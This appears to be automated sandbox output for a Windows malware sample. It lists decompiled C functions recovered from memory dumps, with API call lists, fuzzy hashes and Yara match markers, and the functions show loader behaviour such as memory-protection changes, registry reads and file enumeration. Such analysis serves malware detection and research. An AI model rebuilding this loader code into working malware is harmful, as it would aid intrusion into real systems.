                                      • Instruction Fuzzy Hash: 46316171E00219AFEB01CF99C891BDEB7F5FF49384F108169E904A7249D771AA45CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                                    E00FA4C35(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                        intOrPtr _v8;
                                                        void* _v12;
                                                        void* _v16;
                                                        intOrPtr _t26;
                                                        intOrPtr* _t28;
                                                        intOrPtr _t31;
                                                        intOrPtr* _t32;
                                                        void* _t39;
                                                        int _t46;
                                                        intOrPtr* _t47;
                                                        int _t48;

                                      0x00fa4c41              _t47 = __eax;
                                      0x00fa4c45              _push( &_v12);
                                      0x00fa4c46              _push(__eax);
                                      0x00fa4c47              _t39 = 0;
                                      0x00fa4c49              _t46 = 0; // executed
                                      0x00fa4c4b              _t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                      0x00fa4c50              _v8 = _t26;
                                      0x00fa4c53              if(_t26 < 0) {
                                      0x00fa4cea                  L13:
                                      0x00fa4cf1                  return _v8;
                                      0x00fa4cf1              }
                                      0x00fa4c5c              if(_v12 == 0) {
                                      0x00fa4c63                  Sleep(0xc8);
                                      0x00fa4c73                  _v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                      0x00fa4c73              }
                                      0x00fa4c79              if(_v8 >= _t39) {
                                      0x00fa4c7b                  _t28 = _v12;
                                      0x00fa4c80                  if(_t28 != 0) {
                                      0x00fa4c89                      _t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                      0x00fa4c91                      _v8 = _t31;
                                      0x00fa4c94                      if(_t31 >= 0) {
                                      0x00fa4c9f                          _t46 = lstrlenW(_v16);
                                      0x00fa4ca3                          if(_t46 != 0) {
                                      0x00fa4ca5                              _t46 = _t46 + 1;
                                      0x00fa4ca6                              _t48 = _t46 + _t46;
                                      0x00fa4caf                              _t39 = E00FA550F(_t48);
                                      0x00fa4cb3                              if(_t39 == 0) {
                                      0x00fa4cc4                                  _v8 = 0x8007000e;
                                      0x00fa4cb5                              } else {
                                      0x00fa4cba                                  memcpy(_t39, _v16, _t48);
                                      0x00fa4cbf                              }
                                      0x00fa4cce                              __imp__#6(_v16);
                                      0x00fa4cce                          }
                                      0x00fa4ca3                      }
                                      0x00fa4cd4                      _t32 = _v12;
                                      0x00fa4cda                       *((intOrPtr*)( *_t32 + 8))(_t32);
                                      0x00fa4cda                  }
                                      0x00fa4ce3                   *_a4 = _t39;
                                      0x00fa4ce8                   *_a8 = _t46 + _t46;
                                      0x00fa4ce8              }
                                      0x00000000              goto L13;
                                                    }

                                      APIs
                                      • Sleep.KERNEL32(000000C8), ref: 00FA4C63
                                      • lstrlenW.KERNEL32(?), ref: 00FA4C99
                                      • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00FA4CBA
                                      • SysFreeString.OLEAUT32(?), ref: 00FA4CCE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FreeSleepStringlstrlenmemcpy
                                      • String ID:
                                      • API String ID: 1198164300-0
                                      • Opcode ID: 380b1b6de4260d85bdc4b66f7941dda6da7835c324940955c5d91ead624abf4f
                                      • Instruction ID: 3381eefd244c427d8971df645aa955922e3d658b36cd68943c13daa6f01a2d11
                                      • Opcode Fuzzy Hash: 380b1b6de4260d85bdc4b66f7941dda6da7835c324940955c5d91ead624abf4f
                                      • Instruction Fuzzy Hash: FA2156B5E01209FFCB10DFA4D984D9EBBB5FF4A354B108169E905E7210E774EA41DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                                    E1000116E() {
                                                        char _v28;
                                                        void _v44;
                                                        char _v48;
                                                        void* _v52;
                                                        long _t24;
                                                        int _t25;
                                                        void* _t29;
                                                        intOrPtr* _t31;
                                                        signed int _t34;
                                                        void* _t36;
                                                        intOrPtr _t37;
                                                        int _t41;

                                      0x10001179               *0x10004148 =  *0x10004148 & 0x00000000;
                                      0x10001184              _push(0);
                                      0x10001186              _push(0x10004144);
                                      0x1000118b              _push(1);
                                      0x10001193              _push( *0x10004150 + 0x10005084);
                                      0x10001194               *0x10004140 = 0xc; // executed
                                      0x1000119e              L1000178C(); // executed
                                      0x100011a7              _t34 = 6;
                                      0x100011ac              memset( &_v44, 0, _t34 << 2);
                                      0x100011ca              if(E10001F65( &_v44,  &_v28,  *0x1000414c ^ 0xfd7cd1cf) == 0) {
                                      0x10001229                  _t24 = 0xb;
                                      0x1000122a                  L7:
                                      0x1000122b                  ExitThread(_t24);
                                      0x1000122b              }
                                      0x100011d2              _t25 = lstrlenW( *0x10004138);
                                      0x100011d8              _t7 = _t25 + 2; // 0x2
                                      0x100011d8              _t41 = _t25 + _t7;
                                      0x100011e6              _t10 = _t41 + 8; // 0xa
                                      0x100011ea              _t29 = E10001DBD(_t37, _t10,  &_v48,  &_v52); // executed
                                      0x100011f1              if(_t29 == 0) {
                                      0x100011f3                  _t36 =  *0x10004138;
                                      0x100011fb                  _t31 = _v52;
                                      0x100011ff                   *_t31 = 0;
                                      0x10001205                  if(_t36 == 0) {
                                      0x10001217                       *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
                                      0x10001207                  } else {
                                      0x1000120d                      memcpy(_t31 + 4, _t36, _t41);
                                      0x10001212                  }
                                      0x10001205              }
                                      0x10001220              _t24 = E10001252(_v44, _t37); // executed
                                      0x00000000              goto L7;
                                                    }

                                      APIs
                                      • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,10004144,00000000), ref: 1000119E
                                      • lstrlenW.KERNEL32(?,?,?), ref: 100011D2
                                        • Part of subcall function 10001DBD: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A,?), ref: 10001DCA
                                        • Part of subcall function 10001DBD: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001DE0
                                        • Part of subcall function 10001DBD: _snwprintf.NTDLL ref: 10001E05
                                        • Part of subcall function 10001DBD: CreateFileMappingW.KERNELBASE(000000FF,10004140,00000004,00000000,?,?), ref: 10001E2A
                                        • Part of subcall function 10001DBD: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E41
                                        • Part of subcall function 10001DBD: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF), ref: 10001E76
                                      • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 1000120D
                                      • ExitThread.KERNEL32 ref: 1000122B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
                                      • String ID:
                                      • API String ID: 2378523637-0
                                      • Opcode ID: 9b7e6d5e4ce4092a565944a83a2170496299c577230c9ff7ec0056355b7551d4
                                      • Instruction ID: 026376c05ab4c61b73fdaba5d0631372bd63cec38eb327a8236e93e859c94f52
                                      • Opcode Fuzzy Hash: 9b7e6d5e4ce4092a565944a83a2170496299c577230c9ff7ec0056355b7551d4
                                      • Instruction Fuzzy Hash: 4A1188B6104301ABF701DB60CC89FCB77ECEB98384F024929F501D71A9EB30E5988B55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D5B775
                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00D5B83F
                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00D5B970
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1202733417.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                      Similarity
                                      • API ID: Virtual$Alloc$Protect
                                      • String ID:
                                      • API String ID: 655996629-0
                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                      • Instruction ID: 3a783ab9e63c83f0221434e944aa052c1376b44d39ccf0ec73bc8ae8a200eb65
                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                      • Instruction Fuzzy Hash: 52B1A9B4A00109DFCB48CF84C591AAEB7B5FF88315F248159E915AB341D735EE86CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                                    E00FA4B22() {
                                                        void* _v8;
                                                        int _v12;
                                                        WCHAR* _v16;
                                                        void* __esi;
                                                        void* _t23;
                                                        intOrPtr _t24;
                                                        void* _t26;
                                                        intOrPtr _t32;
                                                        intOrPtr _t35;
                                                        intOrPtr _t38;
                                                        intOrPtr _t42;
                                                        void* _t45;
                                                        void* _t54;

                                      0x00fa4b32              _v12 = 0;
                                      0x00fa4b35              _t23 = E00FA94F1(0,  &_v8); // executed
                                      0x00fa4b3c              if(_t23 != 0) {
                                      0x00fa4b3e                  _v8 = 0;
                                      0x00fa4b3e              }
                                      0x00fa4b41              _t24 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa4b46              _t4 = _t24 + 0xfaed80; // 0x3a49328
                                      0x00fa4b4d              _t5 = _t24 + 0xfaed28; // 0x4f0053
                                      0x00fa4b5a              _t26 = E00FA8393( &_v16, _v8, _t5, _t4); // executed
                                      0x00fa4b5f              _t45 = _t26;
                                      0x00fa4b63              if(_t45 == 0) {
                                      0x00fa4b71                  StrToIntExW(_v16, 0,  &_v12);
                                      0x00fa4b7f                  _t45 = 8;
                                      0x00fa4b83                  if(_v12 < _t45) {
                                      0x00fa4c14                      _t45 = 1;
                                      0x00fa4c14                      __eflags = 1;
                                      0x00fa4b89                  } else {
                                      0x00fa4b89                      _t32 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa4b8e                      _t11 = _t32 + 0xfaed74; // 0x3a4931c
                                      0x00fa4b8e                      _t48 = _t11;
                                      0x00fa4b95                      _t12 = _t32 + 0xfaed28; // 0x4f0053
                                      0x00fa4ba1                      _t54 = E00FA7502(_t11, _t12, _t11);
                                      0x00fa4ba3                      _t58 = _t54;
                                      0x00fa4ba5                      if(_t54 != 0) {
                                      0x00fa4ba7                          _t35 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa4bae                          _t13 = _t35 + 0xfaedbe; // 0x30314549
                                      0x00fa4bc0                          if(E00FA63EE(_t48, _t58, _v8, _t54, _t13, 0x14) == 0) {
                                      0x00fa4bc2                              _t60 =  *0xfad214 - 6;
                                      0x00fa4bc9                              if( *0xfad214 <= 6) {
                                      0x00fa4bcb                                  _t42 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa4bd2                                  _t15 = _t42 + 0xfaebda; // 0x52384549
                                      0x00fa4bdd                                  E00FA63EE(_t48, _t60, _v8, _t54, _t15, 0x13);
                                      0x00fa4bdd                              }
                                      0x00fa4bc9                          }
                                      0x00fa4be2                          _t38 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa4be7                          _t17 = _t38 + 0xfaedb8; // 0x3a49360
                                      0x00fa4bee                          _t18 = _t38 + 0xfaed90; // 0x680043
                                      0x00fa4c0c                          _t45 = E00FA63AB(_v8, 0x80000001, _t54, _t18, _t17);
                                      0x00fa4c0e                          HeapFree( *0xfad1f0, 0, _t54);
                                      0x00fa4c0e                      }
                                      0x00fa4ba5                  }
                                      0x00fa4c20                  HeapFree( *0xfad1f0, 0, _v16);
                                      0x00fa4c20              }
                                      0x00fa4c22              _t53 = _v8;
                                      0x00fa4c27              if(_v8 != 0) {
                                      0x00fa4c29                  E00FA72B8(_t53);
                                      0x00fa4c29              }
                                      0x00fa4c34              return _t45;
                                                    }

                                      APIs
                                      • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03A49328,00000000,?,73BCF710,00000000,73BCF730), ref: 00FA4B71
                                      • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03A49360,?,00000000,30314549,00000014,004F0053,03A4931C), ref: 00FA4C0E
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FA9CB1), ref: 00FA4C20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 37c3877bd290088e8034bb2c8070f4d19904ac78ff0a945cdc6cd5f9e1b20ea2
                                      • Instruction ID: c8e0fe6c52d1b1921544f02abd677c255324a304287c9081e2262001c715c23a
                                      • Opcode Fuzzy Hash: 37c3877bd290088e8034bb2c8070f4d19904ac78ff0a945cdc6cd5f9e1b20ea2
                                      • Instruction Fuzzy Hash: 1A317EF2900108BEDB11EB94DD85EEA7BACFF86750F1400A5F605A7161D7B0AE05FB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                                    E00FA7790(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                        void* _v8;
                                                        char _v48;
                                                        void* __edi;
                                                        intOrPtr _t23;
                                                        long _t30;
                                                        intOrPtr _t34;
                                                        intOrPtr* _t42;
                                                        void* _t43;
                                                        void* _t47;
                                                        intOrPtr* _t48;
                                                        void* _t49;
                                                        intOrPtr _t51;
                                                        void* _t52;

                                      0x00fa7790              _t43 = __ecx;
                                      0x00fa7797              _t42 = _a16;
                                      0x00fa779e              _t48 = __eax;
                                      0x00fa77a2              _t23 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa77a7              _t2 = _t23 + 0xfae671; // 0x657a6973
                                      0x00fa77b2              wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                                      0x00fa77c2              if( *0xfad204 >= 5) {
                                      0x00fa780b                  _push( &_a16);
                                      0x00fa780f                  _push( &_v8);
                                      0x00fa7813                  _push( &_v48);
                                      0x00fa7814                  _t30 = _a4;
                                      0x00fa7817                  "QQSUVWh"();
                                      0x00fa781c                  L5:
                                      0x00fa781c                  _a4 = _t30;
                                      0x00fa781f                  L6:
                                      0x00fa7823                  if(_a4 != 0) {
                                      0x00fa785d                      L9:
                                      0x00fa785d                       *0xfad204 =  *0xfad204 + 1;
                                      0x00fa7863                      L10:
                                      0x00fa786a                      return _a4;
                                      0x00fa786a                  }
                                      0x00fa7825                  _t50 = _a16;
                                      0x00fa7828                   *_t48 = _a16;
                                      0x00fa782a                  _t49 = _v8;
                                      0x00fa7837                   *_t42 = E00FAA93C(_t50, _t49);
                                      0x00fa7839                  _t34 = E00FA93F5(_t47, _t49, _t50);
                                      0x00fa7840                  if(_t34 != 0) {
                                      0x00fa7877                       *_a8 = _t49;
                                      0x00fa787c                       *_a12 = _t34;
                                      0x00fa787e                      if( *0xfad204 < 5) {
                                      0x00fa7880                           *0xfad204 =  *0xfad204 & 0x00000000;
                                      0x00fa7880                      }
                                      0x00000000                      goto L10;
                                      0x00fa787e                  }
                                      0x00fa7842                  _a4 = 0xbf;
                                      0x00fa7849                  E00FA54F9();
                                      0x00fa7857                  HeapFree( *0xfad1f0, 0, _t49);
                                      0x00000000                  goto L9;
                                      0x00fa7857              }
                                      0x00fa77c4              _t51 =  *0xfad230; // 0x2a9a5a8
                                      0x00fa77d7              _t4 = _t51 + 0xfae7c4; // 0x6976612e
                                      0x00fa77d7              _t52 = _t4;
                                      0x00fa77e5              if(RtlAllocateHeap( *0xfad1f0, 0, 0x800) == 0) {
                                      0x00fa77ff                  _a4 = 8;
                                      0x00000000                  goto L6;
                                      0x00fa77ff              }
                                      0x00fa77f8              _t30 = E00FA90BA(_a4, _t43, _t47, _t52,  &_v48,  &_v8,  &_a16, _t37); // executed
                                      0x00000000              goto L5;
                                                    }

                                      APIs
                                      • wsprintfA.USER32 ref: 00FA77B2
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FA77DD
                                        • Part of subcall function 00FA90BA: GetTickCount.KERNEL32 ref: 00FA90D1
                                        • Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA911E
                                        • Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA913B
                                        • Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA915B
                                        • Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA9179
                                        • Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA919C
                                        • Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA91BD
                                      • HeapFree.KERNEL32(00000000,00FA9CFB,?,?,00FA9CFB,?), ref: 00FA7857
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: wsprintf$Heap$AllocateCountFreeTick
                                      • String ID:
                                      • API String ID: 2794511967-0
                                      • Opcode ID: a842dda329d1066bb50e92ca39ed18052c5cb616da431d3874f2531b33d4c14b
                                      • Instruction ID: 82bdf66b46fc2ea959ffc3ef5827531480566942b94fc91511908d8455bc1906
                                      • Opcode Fuzzy Hash: a842dda329d1066bb50e92ca39ed18052c5cb616da431d3874f2531b33d4c14b
                                      • Instruction Fuzzy Hash: 41314BB2500209EBCB01EF64DD84F9A7BFCFB0A354F108026F912A7251D734E955EBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E10001CCA(void* __eax, long __edx, void* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				long _v16;
                                      				signed int _v20;
                                      				int _t33;
                                      				signed int _t36;
                                      				long _t41;
                                      				void* _t50;
                                      				void* _t51;
                                      				signed int _t54;
                                      
                                      				_t41 = __edx;
                                      				_v12 = _v12 & 0x00000000;
                                      				_t36 =  *(__eax + 6) & 0x0000ffff;
                                      				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                      				_v20 = _t36;
                                      				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                      				_v8 = _v8 & 0x00000000;
                                      				if(_t36 <= 0) {
                                      					L11:
                                      					return _v12;
                                      				}
                                      				_t51 = _t50 + 0x24;
                                      				while(1) {
                                      					_t54 = _v12;
                                      					if(_t54 != 0) {
                                      						goto L11;
                                      					}
                                      					asm("bt dword [esi], 0x1d");
                                      					if(_t54 >= 0) {
                                      						asm("bt dword [esi], 0x1e");
                                      						if(__eflags >= 0) {
                                      							_t41 = 4;
                                      						} else {
                                      							asm("bt dword [esi], 0x1f");
                                      							asm("sbb edx, edx");
                                      							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
                                      						}
                                      					} else {
                                      						asm("bt dword [esi], 0x1f");
                                      						asm("sbb edx, edx");
                                      						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
                                      					}
                                      					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
                                      					if(_t33 == 0) {
                                      						_v12 = GetLastError();
                                      					}
                                      					_t51 = _t51 + 0x28;
                                      					_v8 = _v8 + 1;
                                      					if(_v8 < _v20) {
                                      						continue;
                                      					} else {
                                      						goto L11;
                                      					}
                                      				}
                                      				goto L11;
                                      			}

                                      APIs
                                      • VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 10001CF8
                                      • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001D4F
                                      • GetLastError.KERNEL32(?,?), ref: 10001D55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual$ErrorLast
                                      • String ID:
                                      • API String ID: 1469625949-0
                                      • Opcode ID: d88e53f8efb20e6d8783475941c1d8e84c3c5500017356f691ac8a8b67d88bbc
                                      • Instruction ID: d734dc8d30302c8daee21811a107f0bac81e6e6e1e596fd8e7321511c0c59d4b
                                      • Opcode Fuzzy Hash: d88e53f8efb20e6d8783475941c1d8e84c3c5500017356f691ac8a8b67d88bbc
                                      • Instruction Fuzzy Hash: 4721A276900109EFEB20CF99CC84EEEF7F9FB54395F24855AE64067105D3749A89CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 28%
                                      			E00FA3F83(void* __ecx, signed char* _a4) {
                                      				signed int _v8;
                                      				void* _v12;
                                      				void* _t13;
                                      				signed short _t16;
                                      				signed int _t17;
                                      				void* _t19;
                                      				intOrPtr _t20;
                                      				void* _t22;
                                      				void* _t23;
                                      				signed short* _t26;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      				void* _t30;
                                      				intOrPtr* _t31;
                                      
                                      				_t31 = __imp__;
                                      				_t23 = 0;
                                      				_v8 = 1;
                                      				_t28 = 0xfad2e0;
                                      				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                                      				while(1) {
                                      					_t13 = E00FA7DD8(_a4,  &_v12); // executed
                                      					if(_t13 == 0) {
                                      						break;
                                      					}
                                      					_push(_v12);
                                      					_t19 = 0xd;
                                      					_t20 = E00FA8DEA(_t19);
                                      					if(_t20 == 0) {
                                      						HeapFree( *0xfad1f0, 0, _v12);
                                      						break;
                                      					} else {
                                      						 *_t28 = _t20;
                                      						_t28 = _t28 + 4;
                                      						_t23 = _t23 + 1;
                                      						if(_t23 < 3) {
                                      							continue;
                                      						} else {
                                      						}
                                      					}
                                      					L7:
                                      					 *_t31(1);
                                      					if(_v8 != 0) {
                                      						_t26 =  *0xfad2e8; // 0x3a49be8
                                      						_t16 =  *_t26 & 0x0000ffff;
                                      						if(_t16 < 0x61 || _t16 > 0x7a) {
                                      							_t17 = _t16 & 0x0000ffff;
                                      						} else {
                                      							_t17 = (_t16 & 0x0000ffff) - 0x20;
                                      						}
                                      						 *_t26 = _t17;
                                      					}
                                      					return _v8;
                                      				}
                                      				_v8 = _v8 & 0x00000000;
                                      				goto L7;
                                      			}

                                      APIs
                                      • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FA3FA0
                                        • Part of subcall function 00FA7DD8: RtlAllocateHeap.NTDLL(00000000,63699BC3,00FAD2E0), ref: 00FA7E03
                                        • Part of subcall function 00FA7DD8: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FA7E25
                                        • Part of subcall function 00FA7DD8: memset.NTDLL ref: 00FA7E3F
                                        • Part of subcall function 00FA7DD8: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FA7E7D
                                        • Part of subcall function 00FA7DD8: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FA7E91
                                        • Part of subcall function 00FA7DD8: CloseHandle.KERNEL32(?), ref: 00FA7EA8
                                        • Part of subcall function 00FA7DD8: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FA7EB4
                                        • Part of subcall function 00FA7DD8: lstrcat.KERNEL32(?,642E2A5C), ref: 00FA7EF5
                                        • Part of subcall function 00FA7DD8: FindFirstFileA.KERNELBASE(?,?), ref: 00FA7F0B
                                      • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FA3FE5
                                        • Part of subcall function 00FA8DEA: lstrlen.KERNEL32(?,00FAD2E0,73BB7FC0,00000000,00FA3FBD,?,?,?,?,?,00FA9865,?), ref: 00FA8DF3
                                        • Part of subcall function 00FA8DEA: mbstowcs.NTDLL ref: 00FA8E1A
                                        • Part of subcall function 00FA8DEA: memset.NTDLL ref: 00FA8E2C
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00FA9865,?), ref: 00FA3FD9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
                                      • String ID:
                                      • API String ID: 94831996-0
                                      • Opcode ID: d4a9666ee5c1f372652db706a55400dfbb2282623b9fff5acb49bc4a1148ff4b
                                      • Instruction ID: 42be2c4a244fc0baa046fca37e6404d9f087f391186e88ae293c5b4c0f923ffc
                                      • Opcode Fuzzy Hash: d4a9666ee5c1f372652db706a55400dfbb2282623b9fff5acb49bc4a1148ff4b
                                      • Instruction Fuzzy Hash: 0F1104F6A10208EEEB009B95DC44BE9B7B8EF86368F204026F501D7190C3B5AE41FB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FAA881(void* __ecx, void* __eflags) {
                                      				char _v8;
                                      				void* _v12;
                                      				int _v16;
                                      				int _v20;
                                      				intOrPtr _t15;
                                      				intOrPtr _t19;
                                      				long _t24;
                                      				long _t29;
                                      				short* _t31;
                                      				short* _t34;
                                      
                                      				_t15 =  *0xfad230; // 0x2a9a5a8
                                      				_v8 = _v8 & 0x00000000;
                                      				_t3 = _t15 + 0xfaea60; // 0x4f0053
                                      				_v16 = 4;
                                      				_t31 = E00FA230C(__ecx, _t3);
                                      				if(_t31 != 0) {
                                      					_t19 =  *0xfad230; // 0x2a9a5a8
                                      					_t5 = _t19 + 0xfaeabc; // 0x6e0049
                                      					_t34 = E00FA230C(__ecx, _t5);
                                      					if(_t34 != 0) {
                                      						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                      						if(_t24 == 0) {
                                      							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                      							if(_t29 != 0) {
                                      								_v8 = _v8 & 0x00000000;
                                      							}
                                      							RegCloseKey(_v12);
                                      						}
                                      						E00FAA07B(_t34);
                                      					}
                                      					E00FAA07B(_t31);
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA230C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA2315
                                        • Part of subcall function 00FA230C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA233F
                                        • Part of subcall function 00FA230C: memset.NTDLL ref: 00FA2353
                                      • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00FAA8D3
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00FAA8EF
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FAA900
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 830012212-0
                                      • Opcode ID: 0fb328eb5e403f06097f8f883e00d15c3de420bc1f2af80ba7890004448e42b0
                                      • Instruction ID: 7acd57520bb6888dadfc24bc1a6a90fadcc18d1b33265a93f860bc137b4f13d4
                                      • Opcode Fuzzy Hash: 0fb328eb5e403f06097f8f883e00d15c3de420bc1f2af80ba7890004448e42b0
                                      • Instruction Fuzzy Hash: CE115EF2A0020DBBDB11DBA4DC85FAF77FCAB46700F144099B602E6051D774DA09EB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
